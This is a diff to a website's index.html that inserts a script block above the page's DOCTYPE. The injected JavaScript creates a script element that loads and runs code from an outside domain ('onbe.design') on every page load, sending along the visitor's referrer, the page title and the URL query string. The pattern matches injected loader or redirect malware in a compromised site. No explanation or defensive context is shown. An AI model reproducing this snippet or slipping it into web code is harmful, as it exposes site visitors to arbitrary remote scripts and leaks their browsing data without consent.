--- a/index.html
+++ b/index.html
@@ -1,3 +1,14 @@
+<span id="c387a033-83e9-c4f1-657e-a8dda41baf20"></span><script type="application/javascript">
+var d=document;var s=d.createElement('script'); 
+s.src='//onbe.design/CKwP3L?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm5e5ff3bb89f91=script5e5ff3bb89f93&_cid=c387a033-83e9-c4f1-657e-a8dda41baf20'; 
+if (document.currentScript) { 
+document.currentScript.parentNode.insertBefore(s, document.currentScript);
+} else {
+d.getElementsByTagName('head')[0].appendChild(s);
+}
+if (document.location.protocol === 'https:' && '//onbe.design/CKwP3L?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm5e5ff3bb89f91=script5e5ff3bb89f93'.indexOf('http:') === 0 ) {alert('The website works on HTTPS. The tracker must use HTTPS too.');}
+</script>
+
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
